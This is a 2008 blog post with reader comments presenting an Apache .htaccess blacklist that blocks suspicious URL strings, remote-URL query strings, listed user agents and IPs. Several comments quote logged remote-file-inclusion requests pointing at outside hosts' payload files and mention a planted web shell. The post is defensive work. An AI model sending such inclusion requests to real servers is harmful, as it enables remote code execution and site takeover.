Perishable Press 3G Blacklist

by Jeff Starr on Tuesday, May 13, 2008 85 Responses

[ 3G Stormtroopers ]

After much research and discussion, I have developed a concise, lightweight security strategy for Apache-powered websites. Prior to the development of this strategy, I relied on several extensive blacklists to protect my sites against malicious user agents and IP addresses. Over time, these mega-lists became unmanageable and ineffective. As increasing numbers of attacks hit my server, I began developing new techniques for defending against external threats. This work soon culminated in the release of a “next-generation” blacklist that works by targeting common elements of decentralized server attacks. Consisting of a mere 37 lines, this “2G” Blacklist provided enough protection to enable me to completely eliminate over 350 blacklisting directives from my site’s root htaccess file. This improvement increased site performance and decreased attack rates; however, many bad hits were still getting through. More work was needed.

The 3G Blacklist

Work on the 3G Blacklist required several weeks of research, testing, and analysis. During the development process, five major improvements were discovered, documented, and implemented. Using pattern recognition, access immunization, and multiple layers of protection, the 3G Blacklist serves as an extremely effective security strategy for preventing a vast majority of common exploits. The list consists of four distinct parts, providing multiple layers of protection while synergizing into a comprehensive defense mechanism. Further, as discussed in previous articles, the 3G Blacklist is designed to be as lightweight and flexible as possible, thereby facilitating periodic cultivation and maintenance. Sound good? Here it is:

# PERISHABLE PRESS 3G BLACKLIST

# PART I: CHARACTER STRINGS
<IfModule mod_alias.c>
 RedirectMatch 403 \:
 RedirectMatch 403 \;
 RedirectMatch 403 \<
 RedirectMatch 403 \>
 RedirectMatch 403 \/\,
 RedirectMatch 403 \/\/
 RedirectMatch 403 f\-\.
 RedirectMatch 403 \.\.\.
 RedirectMatch 403 \.inc
 RedirectMatch 403 alt\=
 RedirectMatch 403 ftp\:
 RedirectMatch 403 ttp\:
 RedirectMatch 403 \.\$url
 RedirectMatch 403 \/\$url
 RedirectMatch 403 \/\$link
 RedirectMatch 403 news\.php
 RedirectMatch 403 menu\.php
 RedirectMatch 403 main\.php
 RedirectMatch 403 home\.php
 RedirectMatch 403 view\.php
 RedirectMatch 403 about\.php
 RedirectMatch 403 blank\.php
 RedirectMatch 403 block\.php
 RedirectMatch 403 order\.php
 RedirectMatch 403 search\.php
 RedirectMatch 403 errors\.php
 RedirectMatch 403 button\.php
 RedirectMatch 403 middle\.php
 RedirectMatch 403 threads\.php
 RedirectMatch 403 contact\.php
 RedirectMatch 403 include\.php
 RedirectMatch 403 display\.php
 RedirectMatch 403 register\.php
 RedirectMatch 403 authorize\.php
 RedirectMatch 403 \/wp\-signup\.php
 RedirectMatch 403 \/classes\/
 RedirectMatch 403 \/includes\/
 RedirectMatch 403 \/path\_to\_script\/
 RedirectMatch 403 ImpEvData\.
 RedirectMatch 403 head\_auth\.
 RedirectMatch 403 db\_connect\.
 RedirectMatch 403 check\_proxy\.
 RedirectMatch 403 doeditconfig\.
 RedirectMatch 403 submit\_links\.
 RedirectMatch 403 change\_action\.
 RedirectMatch 403 send\_reminders\.
 RedirectMatch 403 comment\-template\.
 RedirectMatch 403 syntax\_highlight\.
 RedirectMatch 403 admin\_db\_utilities\.
 RedirectMatch 403 admin\.webring\.docs\.
 RedirectMatch 403 function\.main
 RedirectMatch 403 function\.mkdir
 RedirectMatch 403 function\.opendir
 RedirectMatch 403 function\.require
 RedirectMatch 403 function\.array\-rand
 RedirectMatch 403 ref\.outcontrol
</IfModule>

# PART II: QUERY STRINGS
<IfModule mod_rewrite.c>
 # enable the rewrite engine in case it is not already switched on elsewhere
 RewriteEngine On
 RewriteCond %{QUERY_STRING} ftp\:   [NC,OR]
 RewriteCond %{QUERY_STRING} http\:  [NC,OR]
 RewriteCond %{QUERY_STRING} https\: [NC,OR]
 RewriteCond %{QUERY_STRING} \[      [NC,OR]
 RewriteCond %{QUERY_STRING} \]      [NC]
 RewriteRule .* -                    [F,L]
</IfModule>

# PART III: USER AGENTS
SetEnvIfNoCase User-Agent "Jakarta Commons" keep_out
SetEnvIfNoCase User-Agent "Y!OASIS/TEST"    keep_out
SetEnvIfNoCase User-Agent "libwww-perl"     keep_out
SetEnvIfNoCase User-Agent "MOT-MPx220"      keep_out
SetEnvIfNoCase User-Agent "MJ12bot"         keep_out
SetEnvIfNoCase User-Agent "Nutch"           keep_out
SetEnvIfNoCase User-Agent "cr4nk"           keep_out
<Limit GET POST PUT>
 order allow,deny
 allow from all
 deny from env=keep_out
</Limit>

# PART IV: IP ADDRESSES
<Limit GET POST PUT>
 order allow,deny
 allow from all
 # blacklist candidate 2008-01-02 = admin-ajax.php attack
 deny from 75.126.85.215
 # blacklist candidate 2008-02-10 = cryptic character strings
 deny from 128.111.48.138
 # blacklist candidate 2008-03-09 = block administrative attacks
 deny from 87.248.163.54
 # blacklist candidate 2008-04-27 = block clam store loser
 deny from 84.122.143.99
</Limit>

Installation and Usage

Before using the 3G Blacklist, check the following system requirements:

  • Linux server running Apache
  • Enabled Apache module: mod_alias
  • Enabled Apache module: mod_rewrite
  • Ability to edit your site’s root htaccess file (or)
  • Ability to modify Apache’s server configuration file

With these requirements met, copy and paste the entire 3G Blacklist into either the root htaccess file or the server configuration file. After uploading, visit your site and check proper loading of as many different types of pages as possible. For example, if you are running a blogging platform (such as WordPress), test different page views (single, archive, category, home, etc.), log into and surf the admin pages (plugins, themes, options, posts, etc.), and also check peripheral elements such as individual images, available downloads, and alternate protocols (FTP, HTTPS, etc.).

While the 3G Blacklist is designed to target only the bad guys, the regular expressions used in the list may interfere with legitimate URL access. If this happens, the browsing device will display a 403 Forbidden error. Don’t panic! Simply check the blocked URL, locate the matching blacklist string, and disable the directive by placing a pound sign ( # ) at the beginning of the associated line. Once the correct line is commented out, the blocked URL should load normally. Also, if you do happen to experience any conflicts involving the 3G Blacklist, please leave a comment or contact me directly. Thank you :)
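
To make that troubleshooting step concrete, here is a small sketch of what a disabled directive looks like. The conflict with search.php is purely an assumption for illustration (say, a theme that serves a legitimate /search.php page); any other line from the list is disabled the same way.

```apache
# PART I excerpt with one rule disabled (hypothetical conflict with /search.php)
<IfModule mod_alias.c>
 RedirectMatch 403 order\.php
# RedirectMatch 403 search\.php
 RedirectMatch 403 errors\.php
</IfModule>
```

Removing the pound sign later restores the rule, so nothing is lost if the conflict turns out to lie elsewhere.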

Wrap Up..

As my readers know, I am serious about site security. Nothing gets my adrenaline pumping more than the thought of a giant meat grinder squirting out endless chunks of mangled cracker meat. Spam and other exploitative activity on the web has grown exponentially. Targeting and blocking individual agents and IP addresses is no longer a viable strategy. By recognizing and immunizing against the broadest array of common attack elements, the 3G Blacklist maximizes resources while providing solid defense against malicious attacks.

Updates

  • 2008/05/14 — removed “RedirectMatch 403 \/scripts\/” from the first part of the blacklist due to conflict with Mint Statistics.
  • 2008/05/18 — removed the following three directives to facilitate Joomla functionality (hat tip: Don):
    RedirectMatch 403 \/modules\/
    RedirectMatch 403 \/components\/
    RedirectMatch 403 \/administrator\/
  • 2008/05/31 — removed “RedirectMatch 403 config\.php” from the first part of the list to ensure proper functionality with the “visual-editing” feature of the WordPress Admin (hat tip: Sat).

85 Responses

Louis#1

This is solid gold :)

I’ve had no issue so far with the whole list pasted into my root .htaccess. I’ll see if it affects the administration of my blog in the future.

Really great stuff as usual from you. The list is clean and comprehensive.

The formatting syntax with the little spaces before Redirect directives is a little strange; is it your new favorite syntax ? :d

Perishable#2

Excellent, thanks for trying it out :) I did as much testing as possible (primarily via WordPress), however it is important to hear how the method works (or doesn’t) in other environments. One thing I failed to emphasize in the article series involves global noninterference. There are many possible strings to blacklist — many of which would be far more effective and efficient — but doing so would result in conflicts and errors on various platforms. Anyway, I am getting carried away here, but I am stoked that you are using 3G! (and yes, the indentation of nested directives is important — even in htaccess files ;)

Louis#3

I might be biased by the excellent post I recently read on Daring Fireball, “Why Apple won’t buy Adobe”, but it might be true in our case that making the rules generic enough that they won’t break any forum/CMS/whatever platform also makes the rules less relevant and powerful.

I think that it may be better to stay focused on one environment only (i.e. WordPress), and do a heck of a job there. We could also have different variants of the list for different platforms.

Anyway, that is just my opinion, as a WordPress lover and PerishablePress reader.

About my question on indentation, it was more about the fact that you are using one space to indent instead of the classic tab. I wondered what motivated this choice.

Alissa Miller#4

This 3G series is great. I’ve been following all the articles and updating my .htaccess in small chunks.

Everything is working magically. I’m glad that you got the update in for the Mint fix. I was going to say something, but you beat me to it.

Don#5

As always great work man! I had a quick test run with it on WP; no holes!

On Joomla (1.013), though, there are a few issues that can be resolved by removing these lines:

RedirectMatch 403 \/modules\/
RedirectMatch 403 \/components\/
RedirectMatch 403 \/administrator\/

I haven’t fully tested in Joomla though; will do when time permits. I also noticed you reduced the list of user agents. May I ask the benefits of the downsize?

Perishable#6

@Louis: good point — the 3G Blacklist may very well evolve along such a trajectory in the future. For now, however, the strategy has proven general enough to protect across platforms without unintentional functional interference. Subsequent editing of 3G directives is critical for the fine-tuning of targeting specificity. This pruning process is greatly facilitated by 3G users such as Don, who continues to help test the list on the Joomla platform. OT: I think tabbed spacing in htaccess code is just too much, almost to the point of looking ridiculous ;)

Perishable#7

@Alissa: Thanks for the positive feedback. I am glad that you are taking advantage of the information :) I should mention that the complete version of the 3G Blacklist (as presented in this article) contains slightly different content than presented in the series. You may want to compare the individual series chunks with the complete version, as only it will be kept current with updates and other findings. Also, good call on Mint — if anything else turns up, please let us know!

Perishable#8

@Don: Thank you — list updated and credit given for the Joomla-conflicting directives. As always, thanks for your help with the Joomla testing. I look forward to hearing of any other potential issues. Actually, I have been considering removing the other three directory path patterns as well. If memory serves, their use in exploitative attacks is rarely seen outside of query strings containing full URL path information. Thus, explicitly blocking the path segments is essentially unnecessary, potentially doing more harm than good, especially given their prevalence in modern file architecture. So, I’ll hedge for now, but wouldn’t be surprised to see them disappear before the end of the month..

As for the downsizing of the user-agent blacklist, there are several benefits, including increased performance, scalability, flexibility, and relevance. Of course, 3G users are welcome to drop in a full copy of the Ultimate htaccess Blacklist or any other mega-list for that matter. For the 3G, I wanted to wipe the slate clean, give it a fresh start and add new agents on an “as-needed” basis. I could go on about it, but rather I will point you to this article for the full story.
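
As a rough sketch of what adding an agent on an “as-needed” basis could look like, the line below follows the pattern of Part III. The agent name ExampleBadBot is made up for illustration and does not refer to any real crawler.

```apache
# PART III addition: "ExampleBadBot" is a hypothetical agent name
SetEnvIfNoCase User-Agent "ExampleBadBot" keep_out
```

Placed alongside the other SetEnvIfNoCase lines, the new entry is picked up by the existing “deny from env=keep_out” rule, so no other changes should be needed.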

Sat#9

Well, all of this is now implemented on a WordPress site for our company. Having tested all the features of the site, everything is still working just as great - but now with added security. Thanks Jeff!

On the admin side of things however, it appears that “RedirectMatch 403 config\.php” breaks the “visual” mode when creating/editing posts in WordPress for me. This is no big deal really, but I just wanted to confirm, if this is the case for you too, or if I missed something.

Cheers,

Sat.

Perishable#10

Thanks for the feedback, Sat. Checking into this, I did notice that the visual-editing mode seemed not to work in WordPress 2.3. I have yet to test on WordPress 2.5, but even if visual editing works in that version, breaking any WordPress-related functionality is a bad idea (especially in 2.3!). Thus, I have removed the offending rule and updated the article accordingly. Thank you for your help in improving the quality of the 3G Blacklist!
Cheers,
Jeff

Louis#11

Hi Jeff,

I couldn’t wipe out of my head what John Gruber once said about Wordpress and caching. It’s such a shame caching isn’t a part of Wordpress core.

Therefore, after giving it some time to grow, I decided to give WP-SuperCache a chance. After some tweaking, it seems to be working on my blog.

In the process, I discovered that the following line of your wonderful 3G Blacklist was causing the plugin not to serve the .html or .html.gz files.

RedirectMatch 403 \/\/

I commented it out and the rest of the blacklist seems to be okay.

I hope it helps :)

Perishable#12

Louis! Good to see you again (I was beginning to wonder if everything was okay..;)

Anyway, check out Alissa Miller’s excellent article covering the Super-Cache/3G-Blacklist conflict. Apparently, Super Cache rewrites permalinks with an extra trailing slash, thus triggering the double-forward slash block from the blacklist. Alissa documents the issue extremely well and provides an easy fix that ensures continued success with the double-forward slash filter.

Regards,
Jeff

Louis#13

Hehe, I make a really bad reader… I even can’t cheerlead :p

By the way, thank you for the link; it was an interesting read. I edited my .htaccess and it’s working fine for me too.

As I had my nose in the Apache code, I changed the way I handle gzip content on my server. I used to have a somewhat tricky strategy involving 3 .htaccess files and so on; now I centralize everything in the root .htaccess, as it should be, and I find the code to be way better.

Here it is:

# SEND GZIPPED CONTENT TO COMPATIBLE BROWSERS
AddEncoding x-gzip .gz
AddType "text/css;charset=utf-8" .css
AddType "text/javascript;charset=utf-8" .js
RewriteCond %{HTTP:Accept-encoding} gzip
#RewriteCond %{HTTP_USER_AGENT} !Safari
RewriteCond %{REQUEST_FILENAME}.gz -f
RewriteRule ^(.*)$ $1.gz [QSA,L]

Perishable#14

Glad to hear that the Blacklist is once again working fine for you. That particular rule blocks many ill requests. It is good to have it!

Interesting that you mention centralizing htaccess rules. I have been working on the very same thing. I am in the process of consolidating everything in the public web root, such that individual domains will require much less fiddling. Definitely way better ;)

Thanks also for the sweet htaccess code — looks juicy! I have seen similar directives floating around the Web, but have yet to experiment with them. As you may know, my host (ASO) recently disabled gzip compression on all servers. I am still able to deliver compressed (X)HTML content, but CSS and JavaScript are currently sent uncompressed.

Louis#15

(a) Yes, it’s my favorite rule indeed, if you remember :p

(b) Managing Apache behavior should always be done in one configuration file (aka .htaccess) only. As you say, it’s way easier.

(c) It is juicy, believe me. I’m using it on my main website for the moment, and boy I wish I had known about it before!

It filters the browsers and serves compatible ones the .gz version of static files, all over your website. That means, for example, that you can gzip WordPress admin JS & CSS files and enjoy a tremendous boost in admin page loading times!

With files like prototype.js or jquery.js being used by WordPress, and weighing around 100 KB, being served a 70% lighter .gz alternative is really cool.

Perishable#16

Definitely sweet, but does that mean you are responsible for manually creating and maintaining the individual zip files?

Louis#17

That’s the whole idea. It only applies to files you know won’t change. You compress them manually once, then serve these .gz files to the visitors.

On-the-fly compression has its great advantages, but for static content, it’s a waste of CPU.

I wrote a full post on this on my blog, but I fear Google’s translation won’t be as appealing as my natural writing style.

Once again, language is a true barrier :/
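
For readers who want to try the pre-compressed approach discussed above, here is a hedged variation on the code from comment #13. Three things are assumptions added here rather than part of that code: the restriction to .css and .js files, the ForceType lines that pin the content type of the .gz copies, and the Vary header (which needs mod_headers). It also assumes the .gz copies were created by hand and sit next to the originals.

```apache
# Serve hand-made .gz copies of static CSS/JS to browsers that accept gzip
AddEncoding x-gzip .gz

<IfModule mod_rewrite.c>
 RewriteEngine On
 RewriteCond %{HTTP:Accept-Encoding} gzip
 # assumption: only rewrite stylesheets and scripts
 RewriteCond %{REQUEST_FILENAME} \.(css|js)$
 # only rewrite when a pre-compressed copy actually exists
 RewriteCond %{REQUEST_FILENAME}.gz -f
 RewriteRule ^(.*)$ $1.gz [QSA,L]
</IfModule>

# assumption: pin the content type so the .gz suffix cannot override it
<FilesMatch "\.css\.gz$">
 ForceType text/css
</FilesMatch>
<FilesMatch "\.js\.gz$">
 ForceType text/javascript
</FilesMatch>

# assumption: tell caches that the response varies by Accept-Encoding
<IfModule mod_headers.c>
 <FilesMatch "\.(css|js)\.gz$">
  Header append Vary Accept-Encoding
 </FilesMatch>
</IfModule>
```

The trade-off is the one described in the comments: no CPU is spent compressing on each request, but every .gz copy has to be regenerated by hand whenever its original changes.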

Tom#18

Is the 3G Blacklist supposed to replace the 2G Blacklist or can you put them both together?

Perishable#19

Hi Tom, the 3G Blacklist is meant to replace the 2G in its entirety. Running both together would be overkill..

James#20

Very nice work!! I put this script in place and have noticed a significant reduction in the log files.
How would you modify this script to deny all user agents (while keeping in place an allow all IP with deny on specific IPs)? In other words, I would like to allow IP (with specific IP denials) and disallow all user agents? I’ve got a pesky problem with user agents (legit names) trying to access an exploit which no longer exists on our site. see below..

f2.d.5446.static.theplanet.com - - [06/Aug/2008:01:00:51 +0000] "GET /portal/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.shakershoppe.com/_files/x.txt??M HTTP/1.1" 403 259

3G is doing a nice job of issuing 403s but I’m ready to turn off all user agents.

Keep up the GREAT WORK!!!

Jeff Starr#21

Hi James, glad to hear the blacklist is working for you :) As far as disallowing all user agents while allowing specific IPs, either I am not understanding you correctly or I am confused as to how that might work. It seems that blocking all user agents would essentially block all traffic/visitors, correct? Otherwise, the rules used to block all user agents would conflict with any list of allowed IP addresses. What am I missing here?
Regards,
Jeff

James#22

Jeff, thanks very much for the quick reply, and sorry about the confusion. After spending some time on the Apache site, I came to the conclusion that blocking user agents (via deny) would also impact the default of deny for IPs. In other words, Apache seems to allow only one default for the typical allow-then-deny ordering.

In essence, blocking all user agents would block all traffic/visitors. I would like to deny all bots/crawlers but allow users. Is there a way to do this (instead of specifying user agents to keep out, like in your PART III: USER AGENTS)?

Thanks,
James

Jeff Starr#23

Hi James, in my experience, blocking specific user agents is a moderately futile endeavor. The reason for this is that user agents are constantly changing and easily faked. Keeping an effective blacklist of user agents requires a fair amount of diligence, researching new agents, new fakes, and then checking and updating the blacklist and so on. This is precisely one of the reasons why I developed the 3G blacklist. The 3G takes a different approach by blocking the various character strings used in attacks, thereby eliminating the need for regular maintenance and, ultimately, monstrous lists of banned agents. Nonetheless, I have compiled an excellent blacklist of undesirable user agents, bad bots, scrapers, and other scumbags. It is extensive in its scope, yet not so exhaustive as to negatively affect server performance. The compressed version of the list is available here.
Regards,
Jeff
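
To illustrate the difference between chasing agents and targeting the request itself, here is a minimal sketch built on the log entry quoted in comment #20. The rule is hypothetical and narrower than it needs to be: Part II of the 3G Blacklist should already catch that request through its “http\:” query-string test, which is consistent with the 403 shown in the log.

```apache
<IfModule mod_rewrite.c>
 RewriteEngine On
 # hypothetical rule: match the remote-include parameter seen in the log entry
 RewriteCond %{QUERY_STRING} mosConfig_absolute_path= [NC]
 RewriteRule .* - [F,L]
</IfModule>
```

A rule like this keeps working no matter which user agent the request claims to be, which is the point of matching attack strings rather than agent names.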

Martin#24

Hey Jeff,

I fired the 3G blacklist into the .htaccess file in my server’s root and things have gone haywire!

I’ve replaced it with the original file, but I’m still getting sitewide Internal Server Errors.

If you have any ideas on what I might’ve done, I’d truly appreciate hearing them,

Cheers,

Jeff Starr#25

Get in touch with your web host asap and explain the issue.. it sounds like something in the htaccess file (or the htaccess file itself) tripped a permanent server error. Generally, when errors like this happen, a reset of the server software is required to restore functionality.

As for the cause of the problem, I would make sure that your server is running Apache and that your host enables local htaccess directives. After that, you need to ensure that the required Apache modules are available to local htaccess files. If you are unsure about any of this, contact your host and they should be able to help you.
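
One possible source of a sitewide 500 error, offered only as a guess since the thread never pins down the cause, is a directive whose module is unavailable. Parts III and IV of the list are not wrapped in IfModule containers, and on Apache 2.4 the order/allow/deny syntax depends on mod_access_compat being loaded. A sketch of a guarded Part III, shortened to a single agent, might look like this:

```apache
# Set the flag only if mod_setenvif is available
<IfModule mod_setenvif.c>
 SetEnvIfNoCase User-Agent "libwww-perl" keep_out
</IfModule>

# Apache 2.2 and earlier: the syntax used in the article
<IfModule !mod_authz_core.c>
 <Limit GET POST PUT>
  order allow,deny
  allow from all
  deny from env=keep_out
 </Limit>
</IfModule>

# Apache 2.4 and later: the Require-based equivalent
<IfModule mod_authz_core.c>
 <RequireAll>
  Require all granted
  Require not env keep_out
 </RequireAll>
</IfModule>
```

With guards like these, a missing module causes the affected rules to be skipped rather than taking the whole site down, at the cost of silently losing that layer of protection.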

Martin#26

Thanks so much for the help mate, I solved the problem by manually deleting .htaccess in two directories (I have wp installed on a subdirectory with index.php in the root) and recreating them with the original data, so sorry for bothering you.

I’m still unsure why the 3G list would cause such havoc, but since the server is running Apache and my host enables local htaccess directives, I’m going to look into number 3: that “required Apache modules are available to local htaccess files”. I hope to get it sorted as soon as I can, and I will let you know how it goes.
Thanks again.

TechJammer#27

Jeff: You have Jakarta Commons blacklisted above, and I have User-Agent entries in my logfile for “Jakarta_Commons-HttpClient/3.1” and also “Jakarta_Commons-HttpClient/3.1-rc1”.

Can you tell me why they are blacklisted? I tried to search info on the web and didn’t find anything useful.

Jeff Starr#28

It’s been awhile, but if I recall correctly, the Jakarta Commons user agent was associated with some relentless email harvesting and subsequent spam activity. I think I finally just got tired of seeing their UA associated with so many mindless resource requests.. Since blacklisting it, Jakarta immediately became a non-issue, so I dumped it from memory. Nonetheless, I encourage you to experiment for yourself. Try removing their UA from the blacklist and watch for any suspicious activity..
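
A side note for anyone running that experiment: the blacklist entry is written with a space (“Jakarta Commons”), while the log entries quoted in comment #27 show an underscore. Whether the underscore is the agent’s real spelling or an artifact of the log format is not something this thread settles, so the following is only a sketch of a pattern that would cover both forms.

```apache
# Matches "Jakarta Commons" as well as "Jakarta_Commons" (assumed log spelling)
SetEnvIfNoCase User-Agent "Jakarta[ _]Commons" keep_out
```

Commenting this line out, and watching the logs for a while, is the simplest way to see whether the agent is still worth blocking.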

TechJammer#29

Thanks for the info Jeff, and also for maintaining such a useful web site! I have used quite a few of your tips and suggestions, and your site has become my primary reference for .htaccess and site security issues!

Denny Smith#30

Thanks for all of your hard work on this site. I too refer to your site anytime I’m in need of .htaccess info / Wordpress loop hacks. Your loops have been instrumental in many of my projects.

Very impressive work!

Thank You!

Jeff Starr#31

Hi Denny, thanks for the kind words! It is certainly an honor to be able to help others with WordPress, htaccess, and other web-design/development projects.

Btw, I really like your site! May I ask how you implemented the live (I assume) video/cam stream in the header area? Very cool.. ;)

Nicole McCreary#32

I’ve had to change all the redirectmatches to rewrite rules in order for it to work on my host.

eg.)

RewriteCond %{REQUEST_URI} ^\: [OR]
RewriteCond %{REQUEST_URI} ^\; [OR]
RewriteCond %{REQUEST_URI} ^\< [OR]
....
RewriteCond %{REQUEST_URI} ^ref\.outcontrol
RewriteRule .* - [F,L]

I don’t touch rewrite rules very often, I was wondering if I have this correct.

Jeff Starr#33

@Nicole: Interesting that your host allows rewriting but not redirectmatch.. may I ask which host you are using?

As for the code, it looks correct, but you could easily test it by appending any of the matched character strings to various URLs at your site. Try a few different ones, and if the URLs return a 403 Forbidden response, everything should be fine.
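
One caveat worth checking when converting the list this way, based on how mod_rewrite documents the variable rather than on anything confirmed in this thread: %{REQUEST_URI} normally begins with a slash, so a pattern anchored with ^ (such as ^\:) can only match at the very first character and would not behave like the unanchored RedirectMatch rules. A sketch of an unanchored conversion, covering just a handful of the Part I strings, could look like this:

```apache
<IfModule mod_rewrite.c>
 RewriteEngine On
 # no ^ anchor, so each string may appear anywhere in the URL path
 RewriteCond %{REQUEST_URI} \:             [OR]
 RewriteCond %{REQUEST_URI} \;             [OR]
 RewriteCond %{REQUEST_URI} \.inc          [OR]
 RewriteCond %{REQUEST_URI} ref\.outcontrol
 RewriteRule .* - [F,L]
</IfModule>
```

The last condition carries no OR flag because it closes the chain; every other condition needs one, otherwise the conditions are ANDed together and the rule rarely fires.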

Nicole McCreary#34

Thanks Jeff, everything works correctly after testing it.

I think the mod_alias problem is an issue with the method my host uses for setting up virtual hosting and not permitting symbolic links to be served, or to even override that option.

Jeff Starr#35

Great, Nicole — glad to hear everything is working correctly. Cheers :)

Denny#36

Hey Jeff,

I am using Windows Media Encoder and a Pentium 4 PC as a server, with a simple webcam set up in my office. Windows Media Encoder is free. The webcam was 50 bucks, and the code is a simple (but not very W3C) embedded Windows Media Player.

Perhaps to date, I am the only person that feeds live video on myspace with the same setup.

Imagine what some people could do if they got their hands on that info! LOL!

Jeff Starr#37

Hi Denny, thanks for the information.. I have been wanting to setup something similar on one of my other sites for quite awhile now. I assume that the video is a live stream and not some pre-recorded footage..? The software looks easy enough, and the embedding seems straightforward, but I imagine that setting up a secure personal server would require some time..

In any case, I think that personal live streaming video will become all the rage, just as soon as the technology makes it easy for “everyone” to do!

Denny Smith#38

Jeff,

That’s correct. It is live video. I am using several things. One is no-ip to mask my actual IP address, as well as a static IP port-forwarded through 2 routers in a local network. (That was sort of a pain.) But a DNS redirect is probably the best advice as far as securing the connection. After all, you essentially open a port on your computer. I had to hack my registry a bit to allow more than 2 connections to come in. I am thinking about writing a tutorial on the process that would better explain how I am doing this.

By the way, I emailed you a copy of my wp-admin but it must have tagged it as spam.

wp-admin.php was renamed to fx_wp-admin.php and contained code like this:

' //eval($code);
   } else {
      testdata('save_fail');
   };
'
Any suggestions on removing this type of hack?

Thanks!

Claudio#39

Thank you, very interesting article. Unfortunately, I’m on a Windows server and I use IIS. By chance, have you ever translated your method for IIS? :-)

Nicole McCreary#40

Regarding IIS - there is no easy or free way of doing the same thing.

You would either have to build something in ASP/.NET which would look at your request parameters and do all the required tests - or purchase a product like http://www.isapirewrite.com/ and then build all the filters you need yourself.

Jeff Starr#41

@Denny: Hmm, I haven’t seen that type of hack before, however I would be more than happy to look at your file if you resend it (zipped!) or post it somewhere on the net..

As for a tutorial on your video streaming technique, I would love to see it, as would many others, I assume. Although one thing I have noticed when visiting your site is that the stream is not always active. On several occasions, the video tries to load but then ends up with just a blank screen..

Claudio#42

@Jeff: thank you for your kind reply. My provider supports isapirewrite, but I may need to study a bit to translate your list into my httpd.ini… :-)
Have a good blogging!

Peter#43

Re: # PART IV: IP ADDRESSES

I have found another very effective way to block IPs from scumbags, remarkably enough in the Apache docs.

First you create a hosts.deny file and add the restricted IPs

190.176.128.6 -
190.176.176.15 -
190.176.150.150 -
190.176.138.63 -

Next you add a rule to your vhost config file or server main config.

RewriteEngine on
RewriteMap hosts-deny txt:/path/to/hosts.deny
RewriteCond ${hosts-deny:%{REMOTE_ADDR}|NOT-FOUND} !=NOT-FOUND
RewriteRule ^/.* - [F]

The nice thing about this is you can add IPs and the rule is enforced immediately.

Jeff Starr#44

@Peter: Thanks for the tip! That looks like a potentially useful method of blocking IPs, however keep in mind that not everyone has access to the server configuration file(s). Also note that rules added directly to individual htaccess files are also “enforced immediately.” Great tip though — thanks for sharing! :)

Peter#45

The same code could be used from a .htaccess file. The problem using .htaccess files is the server has to work looking for more controls up the path unless you use AllowOverride None at the bottom of your file. This will however render any other .htaccess files useless in higher directories.
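
A note of caution on moving this into .htaccess: according to the Apache documentation, the RewriteMap directive can only be declared in server or virtual-host context, and AllowOverride is only valid inside Directory sections of the server configuration. The map itself can still be used from .htaccess once it has been declared. The split below is a sketch under those constraints; the paths are placeholders.

```apache
# --- httpd.conf or a <VirtualHost> block (not .htaccess) ---
RewriteEngine On
RewriteMap hosts-deny "txt:/path/to/hosts.deny"

# optional: skip .htaccess lookups for this tree ("/path/to/docroot" is a placeholder)
<Directory "/path/to/docroot">
 AllowOverride None
</Directory>

# --- .htaccess alternative for the rule itself (requires AllowOverride FileInfo) ---
# in per-directory context the leading slash is stripped, so match ".*" instead of "^/.*"
RewriteEngine On
RewriteCond ${hosts-deny:%{REMOTE_ADDR}|NOT-FOUND} !=NOT-FOUND
RewriteRule .* - [F]
```

The two halves are alternatives: with AllowOverride None in place, the .htaccess portion is never read, so the RewriteCond and RewriteRule would then belong in the server configuration as shown in comment #43.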

Denny#46

By the way Jeff. I found the culprit. Someone uploaded a C99madShell v. 2.0 madnet edition to my server. How could they get that on my server?

Jeff Starr#47

@Peter: Thanks for the follow-up! Deny (and other blacklisting) directives are typically implemented in the root htaccess file, though, so generally there is no need for the server to do any extra work, as far as I know..

@Denny: That’s crazy! Sounds like a serious security breach, if you ask me. If your site is otherwise secure, I wouldn’t rule out malicious activity from the admin/tech staff of your current hosting provider (unless you are self-hosted of course)..

Michel#48

Hi,

Thanks for the Tips.

The RedirectMatch 403 \/\/ does not work on this attack:
http://www.mydomainname.com/request/playing.php/playing.php/common/db.php?commonpath=http://mun-hwa.com/bbs/kombi.txt?

But RedirectMatch 403 db\.php works, and the most important thing is to block outgoing traffic from the server on port 80, so the server cannot fetch this URL:
http://mun-hwa.com/bbs/kombi.txt? :-)
I think the firewall works for most PHP include attacks.

Also, I use OSSEC to find attacks!

Thanks for helping! I hope to find more tips here in the future!
Great job!

Michel

AXZM#49

I can’t say enough good things about your work. I have had countless websites hacked over the years, some my fault, some the hosting provider, some the middleware I was using but in all cases if I had taken the right precautions in my .htaccess, I would have saved myself a lot of time and trouble. Thanks again…

Jeff Starr#50

@Michel: My pleasure.. thanks for the heads up on the db.php vector; I will be implementing it into the next (4G) version of the blacklist. As you mention, the kombi.txt URL is blocked via query-string character match against http:, so no worries there. Ossec is another good call, of course. Thanks for the tips!

@AXZM: Thanks for the feedback! It is always good to hear positive reports about the blacklist. Also, as previously mentioned, I am working on the next version of the blacklist, which will protect against a broader range of attacks using optimized directives and improved overall performance. Stay tuned..
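
For anyone who wants to try the db.php rule from comment #48 before it lands in a future version, a minimal sketch in the style of Part I follows. Treat it as an untested candidate: like the other Part I patterns it is unanchored, so it may also block legitimate files on some platforms.

```apache
<IfModule mod_alias.c>
 # unanchored: also matches any path that merely contains "db.php", e.g. /admin_db.php
 RedirectMatch 403 db\.php
</IfModule>
```

If a legitimate page starts returning 403 Forbidden after adding the rule, commenting the line out again restores access.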

Tony#51

I just added the 3G Blacklist to my .htaccess, thanks for the wonderful tips you’re sharing. I’ve been implementing your various tips the last few days, and the coldform too, that I’m starting to feel a little guilty, hehe.

I guess the “RedirectMatch 403 \/\/” isn’t conflicting with WP Super Cache anymore. Everything is working great on my blog.

Thanks!

PS: I wanted to be sure there are no problems with the list before submitting the comment, and found out that validator.w3.org can’t access my page, and neither can whatsmyip.org/mod_gzip_test/ (was using it to check if Super Cache is working). I guess these services just append our URL to the end of theirs, and the result is a double forward slash // , which conflicts, again, with this line:

RedirectMatch 403 \/\/

I guess you knew about this… Anyway we can comment it out when we use these services.
I don’t know what the line means, but I guess it’s not that important since you’re not using it. The validator could access perishablepress.com, and found one error. I’ll report you to the code police now!

I’m joking, don’t worry. I won’t tell them.

[ Gravatar Icon ]

Jeff Starr#52

@Tony: Glad to hear you are getting the most out of my site! That’s what it’s here for, so I am certainly glad you find the content useful.

That is good news that WP Super Cache is no longer conflicting with the directives in the blacklist. I had heard that they recently updated the plugin, and so it looks as if they must have fixed the issue referred to here. Great news :)

